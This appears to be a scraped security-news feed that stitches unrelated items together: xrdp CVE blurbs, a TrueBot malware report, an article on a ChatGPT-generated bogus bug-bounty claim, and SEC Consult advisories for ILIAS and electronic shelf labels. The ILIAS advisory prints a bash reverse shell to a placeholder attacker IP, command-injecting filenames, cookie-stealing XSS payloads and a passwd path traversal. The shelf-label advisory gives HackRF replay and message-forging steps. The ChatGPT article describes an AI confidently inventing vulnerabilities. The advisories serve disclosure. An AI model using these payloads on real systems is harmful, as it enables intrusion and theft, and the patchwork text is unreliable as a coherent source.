xrdp is an open source project which provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp < v0.9.21 contain a Integer Overflow in xrdp_mm_process_rail_update_window_text() function. There are no known workarounds for this issue. Users are advised to upgrade.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-23484: Integer Overflow in xrdp_mm_process_rail_update_window_text

xrdp is an open source project which provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp < v0.9.21 contain a Out of Bound Read in libxrdp_send_to_channel() function. There are no known workarounds for this issue. Users are advised to upgrade.

CVE-2022-23483: Out-of-Bound Read in libxrdp_send_to_channel

xrdp is an open source project which provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp < v0.9.21 contain a Out of Bound Read in xrdp_sec_process_mcs_data_CS_CORE() function. There are no known workarounds for this issue. Users are advised to upgrade.

CVE-2022-23482: Out-of-Bound Read in xrdp_sec_process_mcs_data_CS_CORE

xrdp is an open source project which provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp < v0.9.21 contain a buffer over flow in audin_send_open() function. There are no known workarounds for this issue. Users are advised to upgrade.

CVE-2022-23477: Buffer Overflow in audin_send_open

Cybersecurity researchers have reported an increase in TrueBot infections, primarily targeting Mexico, Brazil, Pakistan, and the U.S.
Cisco Talos said the attackers behind the operation have moved from using malicious emails to alternative delivery methods such as the exploitation of a now-patched remote code execution (RCE) flaw in Netwrix auditor as well as the Raspberry Robin worm.
"

Cybersecurity researchers have reported an increase in **TrueBot** infections, primarily targeting Mexico, Brazil, Pakistan, and the U.S.

Cisco Talos said the attackers behind the operation have moved from using malicious emails to alternative delivery methods such as the exploitation of a now-patched remote code execution (RCE) flaw in Netwrix auditor as well as the Raspberry Robin worm.

"Post-compromise activity included data theft and the execution of Clop ransomware," security researcher Tiago Pereira said in a Thursday report.

TrueBot is a Windows malware downloader that's attributed to a threat actor tracked by Group-IB as Silence, a Russian-speaking crew believed to share associations with Evil Corp (aka DEV-0243) and TA505.

The first-stage module functions as an entry point for subsequent post-exploitation activities, including information theft using a hitherto unknown custom data exfiltration utility dubbed Teleport, the cybersecurity firm said.

The use of Raspberry Robin – a worm mainly spread through infected USB drives – as a delivery vector for TrueBot was highlighted recently by Microsoft, which it said is part of a "complex and interconnected malware ecosystem."

In what's a further sign of enmeshed collaboration with other malware families, Raspberry Robin has also been observed deploying FakeUpdates (aka SocGholish) on compromised systems, ultimately leading to ransomware-like behavior linked to Evil Corp.

Microsoft is tracking the operators of the USB-based malware as DEV-0856 and the Clop ransomware attacks that happen via Raspberry Robin and TrueBot under the emerging threat cluster DEV-0950.

"DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages," the Windows maker noted in October 2022.

The latest findings from Cisco Talos show that the Silence APT carried out a small set of attacks between mid-August and September 2022 by abusing a critical RCE vulnerability in Netwrix auditor (CVE-2022-31199, CVSS score: 9.8) to download and run TrueBot.

The fact that the bug was weaponized merely a month after its public disclosure by Bishop Fox in mid-July 2022 suggests that "attackers are not only on the lookout for new infection vectors, but are also able to quickly test them and incorporate them into their workflow," Pereira said.

TrueBot infections in October, however, entailed the use of a different attack vector – i.e., Raspberry Robin – underscoring Microsoft's assessment about the USB worm's central role as a malware distribution platform.

The primary function of TrueBot is to collect information from the host and deploy next-stage payloads such as Cobalt Strike, FlawedGrace, and Teleport. This is followed by the execution of the ransomware binary after harvesting relevant information.

The Teleport data exfiltration tool is also notable for its ability to limit upload speeds and file sizes, thereby causing the transmissions to go undetected by monitoring software. On top of that, it can erase its own presence from the machine.

A closer look at the commands issued via Teleport reveals that the program is being exclusively used to collect files from OneDrive and Downloads folders as well as the victim's Outlook email messages.

"The Raspberry Robin delivery led to the creation of a botnet of over 1,000 systems that is distributed worldwide, but with particular focus on Mexico, Brazil, and Pakistan," Pereira said.

The attackers, however, appear to have switched to an unknown TrueBot distribution mechanism starting in November, with the vector succeeding in co-opting over 500 internet-facing Windows servers located in the U.S., Canada, and Brazil into a botnet.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Truebot Malware Variant Leveraging Netwrix Auditor Bug and Raspberry Robin Worm

Improving large language models offer ‘just one more way to attack code, and one more way to defend code’

Improving large language models offer ‘just one more way to attack code, and one more way to defend code’

A supposed security researcher has tried and failed to file an apparently bogus cryptocurrency vulnerability with the help of ChatGPT, the latest and most eerily impressive large language model (LLM) from OpenAI.

The report of the ‘bug’ in OUSD stablecoin was sent to Daniel Von Fange, a distributed systems engineer who contributes to several cryptocurrency code repositories. After a bit of back and forth, it became clear to Von Fange that his interlocutor was at least partly a bot.

**A bug that doesn’t exist**

The first report claimed that two important access control modifiers in the OUSD implementation were “not defined anywhere in the code”. As a result, the reporter warned, anyone could potentially call these functions and “access or manipulate the \[smart\] contract’s assets in unintended ways”.

The report also contains several paragraphs on the impact of the bug and possible remedies.

The claims were obviously bogus, Von Fange told The Daily Swig, because the code would neither compile nor deploy if it tried to call internal code that wasn’t there.

“I first assumed that it was a new bounty hunter who didn’t know that contracts could inherit code from other contracts,” Von Fange said. “While it was obviously a wrong report, I still checked that the code was actually there, and sent a link back to the reporter. We try to be both fast and paranoid about security reports.”

**A stubborn reporter that gets the facts wrong**

After Von Fange replied that the modifiers were inherited from another module, the bug reporter persisted by providing a code snippet that purportedly demonstrated exploitability.

Again, Von Fange tested the code and proved that the exploit did not work. However, the reporter returned with another long description, which still got the facts wrong.

RELATED Take threats against machine learning systems seriously, security firm warns

“I was most surprised by the mixture of clear writing and logic, but built off an ignorance of 101-level coding basics,” he said. “It’s like someone with all the swagger and sponsor-covered nomex of a NASCAR driver, but who can’t find the steering wheel in a pickup truck.”

At this point, Von Fange became almost certain that he was dealing with an AI bot and finished the conversation with: “Nice try, ChatGPT”. The reporter later confirmed to Von Fange that ChatGPT was being used in the reports but nevertheless demanded a bounty for the ‘vulnerabilities’.

**Unmasking ChatGPT**

“What actually tipped me off was the inconstancy between emails – each email seemed to pretend we were discussing a different bug, and each was a bug based on nonsensical premises, and each set of code sent along to prove the issues was valueless,” Von Fange said.

It’s not unusual for people to send bug reports that could never happen, or code that proves nothing, he continued.

“But humans don’t usually forget the context of what you have been talking about, and low-effort bounty hunters usually go elsewhere as soon as they realize they are dealing with someone who has seen through a bogus submission,” he added.

On Twitter, Von Fange described ChatGPT’s report as “plausible text and impacts wrapped in magnificent misunderstandings of the basics”.

This description of ChatGPT’s capabilities and limitations reflects observations of the LLM made by AI experts.

Exposed to enormous volumes of text and guidance from human trainers, the large language model can compose prose that is grammatically correct and mostly coherent. However, it often lacks basic facts, common sense, and other knowledge that is not clearly defined in its training text.

**LLMs and the future of bug hunting**

LLMs have proven to be useful for programming. Codex, another language model developed by OpenAI, is very good at autocompleting lines or generating complete blocks of code.

However, existing LLMs also have distinct constraints when it comes to logic and reasoning.

“I think the current LLMs are good at finding plausible reasons why code might have a vulnerability,” Von Fange said. “The big missing piece is determining if that vulnerability is actually there.”

A bigger breakthrough will come when the AI can automatically write and run code to verify if the vulnerability can actually be exploited, Von Fange believes.

“Of course, bad guys will hook this up to automatically exploit code once when a vulnerability is discovered,” he said. “This will be an arms race between the good guys and the bad guys.

“But that is what security always has been. There is no silver bullet, just one more way to attack code, and one more way to defend code.”

RECOMMENDED Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

ChatGPT bid for bogus bug bounty is thwarted

ChatGPT bid for bogus crypto bug bounty is thwarted

ILIAS eLearning versions 7.15 and below suffer from authenticated command injection, persistent cross site scripting, local file inclusion, and open redirection vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >  
=======================================================================  
               title: Multiple critical vulnerabilities  
             product: ILIAS eLearning platform  
  vulnerable version: <= 7.15  
       fixed version: 7.16  
          CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,  
                      CVE-2022-45918  
              impact: critical  
            homepage: https://www.ilias.de  
               found: 2022-09-30  
                  by: Anna Hartig (Office Bochum)  
                      Constantin Schwarz (Office Bochum)  
                      Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Around since 1998, ILIAS is a powerful learning management system that fulfills  
all your requirements. Using its integrated tools, small and large businesses,  
universities, schools and public authorities are able to create tailored,  
individual learning scenarios."

Source: https://www.ilias.de/en/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
ILIAS utilizes several third-party programs to perform tasks like creating PDF  
files or scanning uploaded files for known viruses. These are called using the  
PHP exec() function. In several instances, the arguments passed to the exec()  
function contain user input that is not properly sanitized.  
By performing malicious configuration steps or uploading dangerous files, an  
attacker can execute arbitrary system commands with the rights of the web server  
user (www-data).  
The privilege required for the different instances of command injection range  
from low rights to admin rights.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple stored cross-site scripting vulnerabilities were identified in ILIAS  
course items. These were either achieved by bypassing existing XSS filters or  
simply by exploiting missing input validation altogether. This results in the  
execution of attacker-controlled JavaScript code by the user's browser.  
The attacker requires the right to create course items, e.g., as a tutor of a  
course.

3) Local File Inclusion - CVE-2022-45918  
The included SCORM editor features a debugger that gives authors insights into  
the current SCORM player session, as well as previous sessions. When accessing  
the logs of previous sessions, the debugger fails to validate the requested  
file path, allowing for arbitrary filesystem access.

4) Open Redirect - CVE-2022-45917  
The function shib_logout.php redirects the user to a URL specified in the  
"return" parameter. Since this parameter is not validated, an attacker can use  
it to redirect a victim to an arbitrary website. This is a powerful tool in  
phishing campaigns, as it allows hiding the malicious webpage behind a link that  
looks like it would take you to the real ILIAS webpage.

Proof of concept:  
-----------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
Multiple instances of command injection vulnerabilities were identified:

a) ZIP archive upload  
Normal users with open assessments can submit their solution by uploading a ZIP  
archive. These archives are extracted on the server and scanned for viruses  
recursively. The directory and file names can be used by an attacker to inject  
system commands, e.g., by including a directory with the name  
$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker  
is able to get a reverse shell on the ILIAS webserver with the rights of the  
web server user (www-data).

b) Media object creation  
ILIAS can be configured so that users can create media objects based on files  
inside an "Upload Directory". Before these objects are created, the files are  
scanned for viruses. The file names can be used by an attacker to inject system  
commands. By placing a file with a name like $(touch /tmp/pwned) inside the  
upload directory and then creating a media object based on it, an attacker is  
able to execute arbitrary system commands with the rights of www-data on the  
server.

c) PDF document creation  
ILIAS provides users the functionality to export content as PDF files. A user  
with admin rights can configure the path to the preferred PDF renderer. An  
attacker can use this parameter to inject system commands. Due to missing  
input validation it is possible to inject multiple commands. The path to  
wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By  
changing the path to:

/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects  
to the attacker's machine on port 13373. The reverse shell is initiated when  
the export function is triggered.  
No PDF renderer has to be installed for this vulnerability to be exploitable.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple instances of stored cross-site scripting were identified:

a) Several Stored XSS Attacks in Tests  
An attacker must be able to create new tests in which the JavaScript code will  
be embedded. If a victim then later accesses one of those tests, the XSS payload will  
be triggered. The "Question" input field of a test has a filter in place, which  
correctly removes HTML tags such as <script> or  
<img src="x" onerror="alert(document.cookie)">. By making use of half open HTML  
tags, this filter can be successfully bypassed. E.g.

<img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test  
to trigger an XSS. It's important to end the JavaScript code with a quotation  
mark or space, to properly separate it from successive HTML tags, after it's  
embedded into a test.

Finally, the "Question" input field of the question type "Long Menu" was  
identified to use no filtering at all, resulting in the unrestricted use of  
arbitrary HTML tags such as <script>.

b) Stored XSS in title of course items  
An attacker with rights to create an arbitrary course item can conduct a stored  
XSS attack by setting the title of the element to:

" onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is  
triggered.

c) Stored XSS in HTML sites  
An attacker with rights to edit an HTML Learning Module can conduct a stored  
XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even  
if this behavior is intended, it is insecure and considered bad practice.

3) Local File Inclusion - CVE-2022-45918  
As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS  
platform. An attacker with access to a SCORM player can open the SCORM  
debugger and request the logs of a previous session. By changing the value of  
the "logFile" query parameter of the request, they can read arbitrary  
files of the server's filesystem. For example, to read the passwd file  
on Linux systems, an attacker can change the value of the parameter logfile  
to "../../../../../../../../../etc/passwd".

4) Open Redirect - CVE-2022-45917  
The shib_logout function is vulnerable to an open redirect.  
A URL that successfully uses this vulnerability to redirect to  
"https://www.sec-consult.com" is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities were identified in ILIAS version 7.14.  
However, a brief analysis of the source code suggests, that several  
vulnerabilities are present in versions dating back to at least 3.8.4.  
Hence it is assumed that most current versions of the product are affected.

The vulnerabilities were partly fixed in version 7.15, a complete patch is  
available with version 7.16.

Vendor contact timeline:  
------------------------  
2022-10-07: Contacting vendor through security@lists.ilias.de  
2022-10-19: Sending initial email again, as the vendor did not yet respond  
2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and  
             identified personal email addresses from the vendor's website.  
2022-10-25: Sending the advisory to the provided contact  
2022-10-31: Vendor requests more information  
2022-10-31: Sending detailed PoC  
2022-11-10: Asking for current status  
2022-11-22: Vendor confirms that patches will be available by 2022-11-26  
2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs  
2022-11-23: Vendor provides information about patched versions; CVE IDs will be  
             requested by SEC Consult  
2022-11-24: Vendor releases patched version 7.16  
2022-12-06: Public release of security advisory

Solution:  
---------  
Update ILIAS to version 7.16 or newer from the vendor's website:  
https://docu.ilias.de/goto.php?target=st_229

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF  A. Hartig, C. Schwarz, N. Schilling / @2022

ILIAS eLearning 7.15 Command Injection / XSS / LFI / Open Redirect

Zhuhai Suny Technology ESL Tag suffers from replay attacks and a forgery attack allowing for the displaying of arbitrary contents.

SEC Consult Vulnerability Lab Security Advisory < 20221201-0 >  
=======================================================================  
               title: Replay attacks & Displaying arbitrary contents  
             product: Zhuhai Suny Technology ESL Tag / ETAG-TECH protocol  
                      (electronic shelf labels)  
  vulnerable version: All  
       fixed version: -  
          CVE number: CVE-2022-45914  
              impact: critical  
            homepage: http://www.zhsuny.com/  
               found: 2022-05-27  
                  by: Steffen Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Zhuhai Suny Technology Co., Ltd, founded in 2016 and located in Zhuhai  
Guangdong, is the manufacturer of electronic shelf labels and Alibaba  
Super Key Account Gold Supplier specializing in ESL with over 10 years’  
experiences focusing on helping customers reduce cost and boost sales.

Since its founding, Suny has attached great importance to exploring  
both international and domestic markets, thus becoming China’s top 1  
manufacturer of electronic shelf labels. Its products have been widely  
applied in supermarkets, retail stores, pharmacies, warehouses,  
exhibitions, etc. We has currently provided services to customers from  
more than 180 countries, and total sales in 2020 have exceeded  
15 million US dollars."

Source: http://www.zhsuny.com/profile/

Business recommendation:  
------------------------  
The vendor did not respond to our communication attempts, there is no patch  
available. In case you are using the product, contact the vendor and urge  
them to fix the security vulnerabilities.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

The research has also been presented at various security conferences such as  
hardwear.io, named "Self-labeling electronic shelf labels".

Vulnerability overview/description:  
-----------------------------------  
1) Replay Attack  
The displayed information on the price tag can be updated via a 433 MHz  
custom protocol (called ETAG-TECH). An attacker can record transmitted  
RF samples and replay them later to cause the same action. Thus, it is  
possible to restore an older price on the tag without the need for any  
information about the protocol or tag.

2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)  
The ETAG-TECH protocol was reverse engineered. It was noted, that no  
authentication is existent. Hence, one can display arbitrary content  
on the electronic tag by simply transmitting messages according to the  
protocol.

Proof of concept:  
-----------------  
1) Replay Attack  
The tag and base station communicate at 433.264 MHz. Thus, the following  
HackRF command can be used to record a transmission:  
hackrf_transfer -r /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20

The following command was used in order to replay the signal:  
hackrf_transfer -t /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20

A video of the attack has been published here: https://youtu.be/hj_ao25HU1E

2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)  
The base station will transmit a compressed image to the tag. Thus,  
any content can be displayed.

Following steps will have to happen:  
    I) Send wake-up frames to the tag.  
   II) Compress the picture that should be displayed.  
  III) Wrap the compressed picture into the picture data structure.  
   IV) Split the data structure into the image frames.  
    V) Listen for the tag's response.

I) The Wake-up Frame:  
The CRC is calculated over the whole frame, starting with the frame length  
field. The frame counter is counting down to zero. Every unique frame  
(=unique frame counter) is sent five times. The frame is transmitted at  
175 kBaud.

|     Preamble     | Sync Header | Frame Length | Tag ID | Fixed Value | Frame Counter | Fixed Value | CRC16 |  
|------------------|-------------|--------------|--------|-------------|---------------|-------------|-------|  
| AAAAAAAAAAAAAAAA |  D391D391   |      08      | 065302 |     0000    |      0398     |      0A     | CRC   |

II) The Compression Algorithm:  
Runlength encoding is used as compression algorithm. The image is read in  
rows. An "a" stands for either a 1 or 0, depending on if it's a run of  
ones or zeros that is being encoded. A "c" stands for the length of the  
run.

There are four different cases:

Case 1: Less than 8 consecutive bits  
0b1aaaaaaa  
Case 2: Less than 32 consecutive bits  
0b0acccccc  
Case 3: Less than 256 consecutive bits  
0b1a000000 0bcccccccc  
Case 4: Less than 2^16 consecutive bits  
0b0a000000 0bcccccccc 0bcccccccc

III) The picture data structure  
The compression header indicates the color channel:  
FC00000000 = black  
FC80000000 = red

|   LED   | Batch Code | Fixed Value | LED Time | Compression header | Display Height | Display Width | Compressed Image Data   |  
|---------|------------|-------------|----------|--------------------|----------------|---------------|-------------------------|  
|   0700  |    BF75    |     00ED    |   000A   |      FC00000000    |      007F      |      0127     | <Compressed Image Data> |

IV) The Image Frames  
Image frames can only hold 54 Bytes of data. Thus the previously generated  
image data structure is split into chunks of 54 bytes or less.  
The CRC is calculated over the whole frame, starting with the frame length  
field. The frame counter indicates frame 1 out of 9. The frame is transmitted  
at 100 kBaud.

|     Preamble     | Sync Header | Frame Length | Tag ID | Frame Counter | Fixed Value |         Payload        | CRC16 |  
|------------------|-------------|--------------|--------|---------------|-------------|------------------------|-------|  
| AAAAAAAAAAAAAAAA |  D391D391   |      08      | 065302 |      0901     |      33     | <Image Data Structure> |  CRC  |

V) The Tag's Response  
The frame is transmitted at 100 kBaud and repeated three times.

|     Preamble     | Sync Header | Frame Length | Tag ID | Battery Voltage |    RSSI     | Temperature | CRC16 |  
|------------------|-------------|--------------|--------|-----------------|-------------|-------------|-------|  
| AAAAAAAAAAAAAAAA |  D391D391   |      07      | 065302 |    1D = 2.9V    |    2068     |  E9 = 23.3C |  CRC  |

Following these steps, custom images can be sent over the ETAG-TECH protocol.  
The only required information is the tag ID which is printed on the tag.  
Otherwise it can be sniffed by listening to the RF interface and waiting for base  
station communication. Thus, the tag can be fully controlled by an attacker.

Videos of the attack have been published here:  
* Displaying arbitrary tag contents: https://youtu.be/028Gn4VC8yE  
* Receiving arbitrary ESL-TECH messages: https://youtu.be/x7t0QViu2gU

Vulnerable / tested versions:  
-----------------------------  
No version information could be identified for this product.

Vendor contact timeline:  
------------------------  
2022-08-14: Contacting vendor through info@zhsuny.com.cn and zhsuny@yeah.net  
             No response.  
2022-08-27: Contacting vendor through st@zhsuny.com.cn, no response.  
2022-09-12: Contacting vendor again, communicating public release for October  
             No response.  
2022-12-01: Public release of security advisory.

Solution:  
---------  
The vendor did not respond to our communication attempts, there is no patch  
available. In case you are using the product, contact the vendor and urge them  
to fix the security vulnerabilities.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz / @2022

Zhuhai Suny Technology ESL Tag Forgery / Replay Attacks

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Tag

#mac